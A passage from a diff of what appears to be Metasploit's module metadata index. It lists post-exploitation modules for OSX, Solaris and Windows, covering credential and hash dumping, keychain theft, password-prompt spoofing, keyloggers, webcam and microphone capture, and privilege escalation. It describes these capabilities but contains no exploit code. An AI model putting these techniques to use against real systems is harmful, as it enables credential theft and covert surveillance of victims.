ppc64, ppc64le, cbea, cbea64, sparc, sparc64, armle, armbe, aarch64, cmd, php, tty, java, ruby, dalvik, python, nodejs, firefox, zarch, r, riscv32be, riscv32le, riscv64be, riscv64le, loongarch64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-01 02:49:28 +0000", + "path": "/modules/post/osx/gather/apfs_encrypted_volume_passwd.rb", + "is_install_path": true, + "ref_name": "osx/gather/apfs_encrypted_volume_passwd", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_osx/gather/autologin_password": { + "name": "OSX Gather Autologin Password as Root", + "fullname": "post/osx/gather/autologin_password", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "joev " + ], + "description": "This module will steal the plaintext password of any user on the machine\n with autologin enabled. Root access is required.\n\n When a user has autologin enabled (System Preferences -> Accounts), OSX\n stores their password with an XOR encoding in /private/etc/kcpassword.", + "references": [ + "URL-https://web.archive.org/web/20180408062145/http://www.brock-family.org/gavin/perl/kcpassword.html" + ], + "platform": "OSX", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-01 02:49:28 +0000", + "path": "/modules/post/osx/gather/autologin_password.rb", + "is_install_path": true, + "ref_name": "osx/gather/autologin_password", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_osx/gather/enum_adium": { + "name": "OS X Gather Adium Enumeration", + "fullname": "post/osx/gather/enum_adium", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "sinn3r " + ], + "description": "This module will collect Adium's account plist files and chat logs from the\n victim's machine. There are three different actions you may choose: ACCOUNTS,\n CHATS, and ALL. Note that to use the 'CHATS' action, make sure you set the regex\n 'PATTERN' option in order to look for certain log names (which consists of a\n contact's name, and a timestamp). The current 'PATTERN' option is configured to\n look for any log created on February 2012 as an example. To loot both account\n plists and chat logs, simply set the action to 'ALL'.", + "references": [], + "platform": "OSX", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-01 02:49:28 +0000", + "path": "/modules/post/osx/gather/enum_adium.rb", + "is_install_path": true, + "ref_name": "osx/gather/enum_adium", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "artifacts-on-disk" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [ + { + "name": "ACCOUNTS", + "description": "Collect account-related plists" + }, + { + "name": "ALL", + "description": "Collect both account plists and chat logs" + }, + { + "name": "CHATS", + "description": "Collect chat logs with a pattern" + } + ] + }, + "post_osx/gather/enum_airport": { + "name": "OS X Gather Airport Wireless Preferences", + "fullname": "post/osx/gather/enum_airport", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "sinn3r " + ], + "description": "This module will download OS X Airport Wireless preferences from the victim\n machine. The preferences file (which is a plist) contains information such as:\n SSID, Channels, Security Type, Password ID, etc.", + "references": [], + "platform": "OSX", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-01 02:49:28 +0000", + "path": "/modules/post/osx/gather/enum_airport.rb", + "is_install_path": true, + "ref_name": "osx/gather/enum_airport", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_osx/gather/enum_chicken_vnc_profile": { + "name": "OS X Gather Chicken of the VNC Profile", + "fullname": "post/osx/gather/enum_chicken_vnc_profile", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "sinn3r " + ], + "description": "This module will download the \"Chicken of the VNC\" client application's\n profile file,\twhich is used to store other VNC servers' information such\n as the IP and password.", + "references": [], + "platform": "OSX", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-01 02:49:28 +0000", + "path": "/modules/post/osx/gather/enum_chicken_vnc_profile.rb", + "is_install_path": true, + "ref_name": "osx/gather/enum_chicken_vnc_profile", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_osx/gather/enum_colloquy": { + "name": "OS X Gather Colloquy Enumeration", + "fullname": "post/osx/gather/enum_colloquy", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "sinn3r " + ], + "description": "This module will collect Colloquy's info plist file and chat logs from the\n victim's machine. There are three actions you may choose: INFO, CHATS, and\n ALL. Please note that the CHAT action may take a long time depending on the\n victim machine, therefore we suggest to set the regex 'PATTERN' option in order\n to search for certain log names (which consists of the contact's name, and a\n timestamp). The default 'PATTERN' is configured as \"^alien\" as an example\n to search for any chat logs associated with the name \"alien\".", + "references": [], + "platform": "OSX", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-01 02:49:28 +0000", + "path": "/modules/post/osx/gather/enum_colloquy.rb", + "is_install_path": true, + "ref_name": "osx/gather/enum_colloquy", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [ + { + "name": "ACCOUNTS", + "description": "Collect the preferences plists" + }, + { + "name": "ALL", + "description": "Collect both the plists and chat logs" + }, + { + "name": "CHATS", + "description": "Collect chat logs with a pattern" + } + ] + }, + "post_osx/gather/enum_keychain": { + "name": "OS X Gather Keychain Enumeration", + "fullname": "post/osx/gather/enum_keychain", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "ipwnstuff ", + "joev " + ], + "description": "This module presents a way to quickly go through the current user's keychains and\n collect data such as email accounts, servers, and other services. Please note:\n when using the GETPASS and GETPASS_AUTO_ACCEPT option, the user may see an authentication\n alert flash briefly on their screen that gets dismissed by a programmatically triggered click.", + "references": [], + "platform": "OSX", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-13 09:23:28 +0000", + "path": "/modules/post/osx/gather/enum_keychain.rb", + "is_install_path": true, + "ref_name": "osx/gather/enum_keychain", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "artifacts-on-disk", + "screen-effects" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": true, + "actions": [] + }, + "post_osx/gather/enum_messages": { + "name": "OS X Gather Messages", + "fullname": "post/osx/gather/enum_messages", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Geckom " + ], + "description": "This module will collect the Messages sqlite3 database files and chat logs\n from the victim's machine. There are four actions you may choose: DBFILE,\n READABLE, LATEST, and ALL. DBFILE and READABLE will retrieve all messages, and\n LATEST will retrieve the last X number of messages (useful with 2FA). Module\n was tested with OS X 10.11 (El Capitan).", + "references": [], + "platform": "OSX", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-01 02:49:28 +0000", + "path": "/modules/post/osx/gather/enum_messages.rb", + "is_install_path": true, + "ref_name": "osx/gather/enum_messages", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [ + { + "name": "ALL", + "description": "Collect all Messages data" + }, + { + "name": "DBFILE", + "description": "Collect Messages DB file" + }, + { + "name": "LATEST", + "description": "Collect the latest message" + }, + { + "name": "READABLE", + "description": "Collect Messages DB and download in a readable format" + } + ] + }, + "post_osx/gather/enum_osx": { + "name": "OS X Gather Mac OS X System Information Enumeration", + "fullname": "post/osx/gather/enum_osx", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Carlos Perez " + ], + "description": "This module gathers basic system information from Mac OS X Tiger (10.4), through\n Mojave (10.14).", + "references": [], + "platform": "OSX", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-01 02:49:28 +0000", + "path": "/modules/post/osx/gather/enum_osx.rb", + "is_install_path": true, + "ref_name": "osx/gather/enum_osx", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "artifacts-on-disk" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_osx/gather/gitignore": { + "name": "Git Ignore Retriever", + "fullname": "post/osx/gather/gitignore", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "N!ght Jmp" + ], + "description": "This module finds potentially sensitive items by finding .gitignore files.", + "references": [], + "platform": "OSX", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-02-03 18:12:53 +0000", + "path": "/modules/post/osx/gather/gitignore.rb", + "is_install_path": true, + "ref_name": "osx/gather/gitignore", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "ioc-in-logs" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_osx/gather/hashdump": { + "name": "OS X Gather Mac OS X Password Hash Collector", + "fullname": "post/osx/gather/hashdump", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Carlos Perez ", + "hammackj ", + "joev " + ], + "description": "This module dumps SHA-1, LM, NT, and SHA-512 Hashes on OSX. Supports\n versions 10.3 to 10.14.", + "references": [], + "platform": "OSX", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-01 02:49:28 +0000", + "path": "/modules/post/osx/gather/hashdump.rb", + "is_install_path": true, + "ref_name": "osx/gather/hashdump", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_osx/gather/password_prompt_spoof": { + "name": "OSX Password Prompt Spoof", + "fullname": "post/osx/gather/password_prompt_spoof", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Joff Thyer ", + "joev ", + "Peter Toth " + ], + "description": "Presents a password prompt dialog to a logged-in OSX user.", + "references": [ + "URL-http://blog.packetheader.net/2011/10/fun-with-applescript.html" + ], + "platform": "OSX", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-01 02:49:28 +0000", + "path": "/modules/post/osx/gather/password_prompt_spoof.rb", + "is_install_path": true, + "ref_name": "osx/gather/password_prompt_spoof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "artifacts-on-disk", + "screen-effects" + ], + "Reliability": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_osx/gather/safari_lastsession": { + "name": "OSX Gather Safari LastSession.plist", + "fullname": "post/osx/gather/safari_lastsession", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "sinn3r " + ], + "description": "This module downloads the LastSession.plist file from the target machine.\n LastSession.plist is used by Safari to track active websites in the current session,\n and sometimes contains sensitive information such as usernames and passwords.\n\n This module will first download the original LastSession.plist, and then attempt\n to find the credential for Gmail. The Gmail's last session state may contain the\n user's credential if his/her first login attempt failed (likely due to a typo),\n and then the page got refreshed or another login attempt was made. This also means\n the stolen credential might contain typos.", + "references": [ + "URL-http://www.securelist.com/en/blog/8168/Loophole_in_Safari" + ], + "platform": "OSX", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-01 02:49:28 +0000", + "path": "/modules/post/osx/gather/safari_lastsession.rb", + "is_install_path": true, + "ref_name": "osx/gather/safari_lastsession", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_osx/gather/vnc_password_osx": { + "name": "OS X Display Apple VNC Password", + "fullname": "post/osx/gather/vnc_password_osx", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Kevin Gonzalvo " + ], + "description": "This module shows Apple VNC Password from Mac OS X High Sierra.", + "references": [], + "platform": "OSX", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-01 02:49:28 +0000", + "path": "/modules/post/osx/gather/vnc_password_osx.rb", + "is_install_path": true, + "ref_name": "osx/gather/vnc_password_osx", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_osx/manage/mount_share": { + "name": "OSX Network Share Mounter", + "fullname": "post/osx/manage/mount_share", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Peter Toth ", + "joev " + ], + "description": "This module lists saved network shares and tries to connect to them using stored\n credentials. This does not require root privileges.", + "references": [], + "platform": "OSX", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-01 02:49:28 +0000", + "path": "/modules/post/osx/manage/mount_share.rb", + "is_install_path": true, + "ref_name": "osx/manage/mount_share", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "ioc-in-logs" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [ + { + "name": "LIST", + "description": "Show a list of stored network share credentials" + }, + { + "name": "MOUNT", + "description": "Mount a network shared volume using stored credentials" + }, + { + "name": "UMOUNT", + "description": "Unmount a mounted volume" + } + ] + }, + "post_osx/manage/record_mic": { + "name": "OSX Manage Record Microphone", + "fullname": "post/osx/manage/record_mic", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "joev " + ], + "description": "This module will allow the user to detect (with the LIST action) and\n capture (with the RECORD action) audio inputs on a remote OSX machine.", + "references": [], + "platform": "OSX", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-01 02:49:28 +0000", + "path": "/modules/post/osx/manage/record_mic.rb", + "is_install_path": true, + "ref_name": "osx/manage/record_mic", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "shell" + ], + "needs_cleanup": null, + "actions": [ + { + "name": "LIST", + "description": "Show a list of microphones" + }, + { + "name": "RECORD", + "description": "Record from a selected audio input" + } + ] + }, + "post_osx/manage/sonic_pi": { + "name": "OS X Manage Sonic Pi", + "fullname": "post/osx/manage/sonic_pi", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Sam Aaron", + "wvu " + ], + "description": "This module controls Sonic Pi via its local OSC server.\n\n The server runs on 127.0.0.1:4557 and receives OSC messages over UDP.\n\n Yes, this is RCE, but it's local. I suggest playing music. :-)", + "references": [ + "URL-https://sonic-pi.net/", + "URL-https://github.com/samaaron/sonic-pi/wiki/Sonic-Pi-Internals----GUI-Ruby-API", + "URL-http://opensoundcontrol.org/spec-1_0" + ], + "platform": "OSX", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-01 02:49:28 +0000", + "path": "/modules/post/osx/manage/sonic_pi.rb", + "is_install_path": true, + "ref_name": "osx/manage/sonic_pi", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "audio-effects", + "screen-effects" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [ + { + "name": "Run", + "description": "Run Sonic Pi code" + }, + { + "name": "Stop", + "description": "Stop all jobs" + } + ] + }, + "post_osx/manage/vpn": { + "name": "OSX VPN Manager", + "fullname": "post/osx/manage/vpn", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Peter Toth " + ], + "description": "This module lists VPN connections and tries to connect to them using stored credentials.", + "references": [], + "platform": "OSX", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-01 02:49:28 +0000", + "path": "/modules/post/osx/manage/vpn.rb", + "is_install_path": true, + "ref_name": "osx/manage/vpn", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [ + { + "name": "CONNECT", + "description": "Connect to a VPN using stored credentials" + }, + { + "name": "DISCONNECT", + "description": "Disconnect from a VPN" + }, + { + "name": "LIST", + "description": "Show a list of VPN connections" + } + ] + }, + "post_osx/manage/webcam": { + "name": "OSX Manage Webcam", + "fullname": "post/osx/manage/webcam", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "joev " + ], + "description": "This module will allow the user to detect installed webcams (with\n the LIST action), take a snapshot (with the SNAPSHOT action), or\n record a webcam and mic (with the RECORD action).", + "references": [], + "platform": "OSX", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-01 02:49:28 +0000", + "path": "/modules/post/osx/manage/webcam.rb", + "is_install_path": true, + "ref_name": "osx/manage/webcam", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "shell" + ], + "needs_cleanup": null, + "actions": [ + { + "name": "LIST", + "description": "Show a list of webcams" + }, + { + "name": "RECORD", + "description": "Record with the webcam" + }, + { + "name": "SNAPSHOT", + "description": "Take a snapshot with the webcam" + } + ] + }, + "post_solaris/escalate/pfexec": { + "name": "Solaris pfexec Upgrade Shell", + "fullname": "post/solaris/escalate/pfexec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "bcoles " + ], + "description": "This module attempts to upgrade a shell session to UID 0 using pfexec.", + "references": [ + "URL-https://docs.oracle.com/cd/E19253-01/816-4557/prbactm-1/index.html", + "URL-http://www.c0t0d0s0.org/archives/4844-Less-known-Solaris-features-pfexec.html", + "URL-http://solaris.wikia.com/wiki/Providing_root_privileges_with_pfexec" + ], + "platform": "Solaris", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 00:19:25 +0000", + "path": "/modules/post/solaris/escalate/pfexec.rb", + "is_install_path": true, + "ref_name": "solaris/escalate/pfexec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "ioc-in-logs" + ], + "Reliability": [ + "repeatable-session" + ] + }, + "session_types": [ + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_solaris/escalate/srsexec_readline": { + "name": "Solaris srsexec Arbitrary File Reader", + "fullname": "post/solaris/escalate/srsexec_readline", + "aliases": [], + "rank": 300, + "disclosure_date": "2007-05-07", + "type": "post", + "author": [ + "h00die", + "iDefense" + ], + "description": "This module exploits a vulnerability in NetCommander 3.2.3 and 3.2.5.\n When srsexec is executed in debug (-d) verbose (-v) mode,\n the first line of an arbitrary file can be read due to the suid bit set.\n The most widely accepted exploitation vector is reading /etc/shadow,\n which will reveal root's hash for cracking.", + "references": [ + "CVE-2007-2617", + "URL-https://download.oracle.com/sunalerts/1000443.1.html", + "URL-https://www.securityfocus.com/archive/1/468235", + "EDB-30021", + "BID-23915" + ], + "platform": "Solaris", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 00:19:25 +0000", + "path": "/modules/post/solaris/escalate/srsexec_readline.rb", + "is_install_path": true, + "ref_name": "solaris/escalate/srsexec_readline", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "ioc-in-logs" + ], + "Reliability": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_solaris/gather/checkvm": { + "name": "Solaris Gather Virtual Environment Detection", + "fullname": "post/solaris/gather/checkvm", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Carlos Perez " + ], + "description": "This module attempts to determine whether the system is running\n inside of a virtual environment and if so, which one. This\n module supports detection of Solaris Zone, VMWare, VirtualBox, Xen,\n and QEMU/KVM.", + "references": [], + "platform": "Solaris", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 00:19:25 +0000", + "path": "/modules/post/solaris/gather/checkvm.rb", + "is_install_path": true, + "ref_name": "solaris/gather/checkvm", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_solaris/gather/enum_packages": { + "name": "Solaris Gather Installed Packages", + "fullname": "post/solaris/gather/enum_packages", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Carlos Perez " + ], + "description": "Post module to enumerate installed packages on a Solaris system.", + "references": [], + "platform": "Solaris", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 00:19:25 +0000", + "path": "/modules/post/solaris/gather/enum_packages.rb", + "is_install_path": true, + "ref_name": "solaris/gather/enum_packages", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_solaris/gather/enum_services": { + "name": "Solaris Gather Configured Services", + "fullname": "post/solaris/gather/enum_services", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Carlos Perez " + ], + "description": "Post module to enumerate services on a Solaris system.", + "references": [], + "platform": "Solaris", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 00:19:25 +0000", + "path": "/modules/post/solaris/gather/enum_services.rb", + "is_install_path": true, + "ref_name": "solaris/gather/enum_services", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_solaris/gather/hashdump": { + "name": "Solaris Gather Dump Password Hashes for Solaris Systems", + "fullname": "post/solaris/gather/hashdump", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Carlos Perez " + ], + "description": "Post module to dump the password hashes for all users on a Solaris system.", + "references": [], + "platform": "Solaris", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 00:19:25 +0000", + "path": "/modules/post/solaris/gather/hashdump.rb", + "is_install_path": true, + "ref_name": "solaris/gather/hashdump", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/capture/keylog_recorder": { + "name": "Windows Capture Keystroke Recorder", + "fullname": "post/windows/capture/keylog_recorder", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Carlos Perez ", + "Josh Hale " + ], + "description": "This module can be used to capture keystrokes. To capture keystrokes when the session is running\n as SYSTEM, the MIGRATE option must be enabled and the CAPTURE_TYPE option should be set to one of\n Explorer, Winlogon, or a specific PID. To capture the keystrokes of the interactive user, the\n Explorer option should be used with MIGRATE enabled. Keep in mind that this will demote this session\n to the user's privileges, so it makes sense to create a separate session for this task. The Winlogon\n option will capture the username and password entered into the logon and unlock dialog. The LOCKSCREEN\n option can be combined with the Winlogon CAPTURE_TYPE to for the user to enter their clear-text\n password. It is recommended to run this module as a job, otherwise it will tie up your framework user interface.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/capture/keylog_recorder.rb", + "is_install_path": true, + "ref_name": "windows/capture/keylog_recorder", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/capture/lockout_keylogger": { + "name": "Windows Capture Winlogon Lockout Credential Keylogger", + "fullname": "post/windows/capture/lockout_keylogger", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "mubix ", + "cg" + ], + "description": "This module migrates and logs Microsoft Windows user's passwords via\n Winlogon.exe using idle time and natural system changes to give a\n false sense of security to the user.", + "references": [ + "URL-http://blog.metasploit.com/2010/12/capturing-windows-logons-with.html" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/capture/lockout_keylogger.rb", + "is_install_path": true, + "ref_name": "windows/capture/lockout_keylogger", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "screen-effects" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/escalate/droplnk": { + "name": "Windows Escalate SMB Icon LNK Dropper", + "fullname": "post/windows/escalate/droplnk", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "mubix " + ], + "description": "This module drops a shortcut (LNK file) that has a ICON reference\n existing on the specified remote host, causing SMB and WebDAV\n connections to be initiated from any user that views the shortcut.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/escalate/droplnk.rb", + "is_install_path": true, + "ref_name": "windows/escalate/droplnk", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "artifacts-on-disk" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/escalate/getsystem": { + "name": "Windows Escalation", + "fullname": "post/windows/escalate/getsystem", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "hdm " + ], + "description": "This module uses the `getsystem` command to escalate the current session to the SYSTEM account using various\n techniques.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/escalate/getsystem.rb", + "is_install_path": true, + "ref_name": "windows/escalate/getsystem", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "AKA": [ + "Named Pipe Impersonation", + "Token Duplication", + "RPCSS", + "PrintSpooler", + "EFSRPC", + "EfsPotato" + ], + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/escalate/golden_ticket": { + "name": "Windows Escalate Golden Ticket", + "fullname": "post/windows/escalate/golden_ticket", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Ben Campbell " + ], + "description": "This module will create a Golden Kerberos Ticket using the Mimikatz Kiwi Extension. If no\n options are applied it will attempt to identify the current domain, the domain administrator\n account, the target domain SID, and retrieve the krbtgt NTLM hash from the database. By default\n the well-known Administrator's groups 512, 513, 518, 519, and 520 will be applied to the ticket.", + "references": [ + "URL-https://github.com/gentilkiwi/mimikatz/wiki/module-~-kerberos" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-09 10:51:17 +0000", + "path": "/modules/post/windows/escalate/golden_ticket.rb", + "is_install_path": true, + "ref_name": 